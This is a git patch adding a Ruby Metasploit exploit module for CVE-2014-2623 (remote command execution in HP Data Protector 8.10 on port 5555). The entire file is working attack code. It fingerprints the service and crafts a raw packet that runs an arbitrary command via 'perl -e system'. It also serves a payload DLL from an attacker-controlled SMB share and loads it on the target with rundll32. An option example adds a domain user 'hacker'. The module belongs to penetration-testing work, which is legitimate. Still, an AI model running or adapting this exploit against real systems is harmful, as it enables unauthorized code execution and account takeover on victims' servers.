From c97a3d9e2ec2ca86534843be109723a155b55c5c Mon Sep 17 00:00:00 2001
From: Matthew Hall <hallm@sec-1.com>
Date: Wed, 10 Dec 2014 09:14:01 +0000
Subject: [PATCH] 
 modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb

---
 .../misc/hp_dataprotector_dll_cmd_exec.rb     | 156 ++++++++++++++++++
 1 file changed, 156 insertions(+)
 create mode 100644 modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb

diff --git a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
new file mode 100644
index 0000000000..70a83c4e32
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'HP Data Protector 8.10 Remote Command Execution',
+      'Description'   => %q{
+        A remote command execution is triggered when a crafted command is sent to the Hp Data Protector Manager on TCP Port 5555.
+      },
+      'Author'      => [
+        'Christian (Polunchis) Ramirez https://intrusionlabs.org', # POC
+        'Henoch (Chanoc) Barrera       https://intrusionlabs.org', # POC
+        'Matthew Hall <hallm@sec-1.com>' # Metasploit Module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-2623' ],
+          [ 'URL', 'http://www.exploit-db.com/exploits/34066/'], # POC
+          [ 'URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
+          [ 'URL', 'http://www.sec-1.com/blog/']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 02 2014'))
+      register_options(
+        [
+          Opt::RPORT(5555),
+          OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
+        ], 
+      self.class)
+  end
+
+  def check
+    fingerprint = get_fingerprint
+
+    if fingerprint.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("#{peer} - HP Data Protector version #{fingerprint}")
+
+    if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
+      minor = $1.to_i
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if minor < 11
+      return Exploit::CheckCode::Appears
+    elsif minor == 12
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Detected
+    end
+
+  end
+
+  def start_server 
+    vprint_status("Generating our malicious dll...")
+    exe = generate_payload_dll
+
+    @exe_file = rand_text_alpha(7) + ".dll"
+    @share = rand_text_alpha(5)
+
+    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
+    vprint_status("About to start SMB Server on: " + @unc)
+    # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
+    start_smb_server(@unc, exe, @exe_file)
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def get_fingerprint
+    ommni = connect
+    ommni.put(rand_text_alpha_upper(64))
+    resp = ommni.get_once(-1)
+    disconnect
+
+    if resp.nil?
+      return nil
+    end
+
+    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
+  end
+
+  def exec_bar(cmd)
+    connect
+    cmd = cmd.gsub("\\", "\\\\\\\\")
+    vprint_status("Sending Command: #{cmd}")
+    cmd_no = target['Offset'] + cmd.length 
+    vprint_status("Size is #{cmd_no}")
+    pkt = "\x00\x00\x00"
+    pkt << cmd_no
+    pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
+    pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
+    pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
+    pkt << "('#{cmd}')" # Executable
+    pkt << "\x00"
+    sock.put(pkt)
+    # In my testing the default timeout (10) isn't enough
+    if datastore['CMD']
+      begin
+        res = sock.get_once(-1, 20)
+      rescue EOFError
+       disconnect
+       return
+      end
+      fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
+      disconnect
+    else
+     handler
+     disconnect
+    end
+  end
+
+  def exec_bar?(data)
+    return false if data.blank?
+    data_unpacked = data.unpack("NnVv")
+    data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
+  end
+
+  def exploit
+    if datastore['CMD']
+      print_status("Executing command #{datastore['CMD']}")
+      exec_bar(datastore['CMD'])
+    else
+      start_server
+      print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{@unc}")
+      sploit = "rundll32.exe #{@unc},"
+      sploit << rand_text_numeric(1) 
+      exec_bar(sploit)
+    end
+  end
+end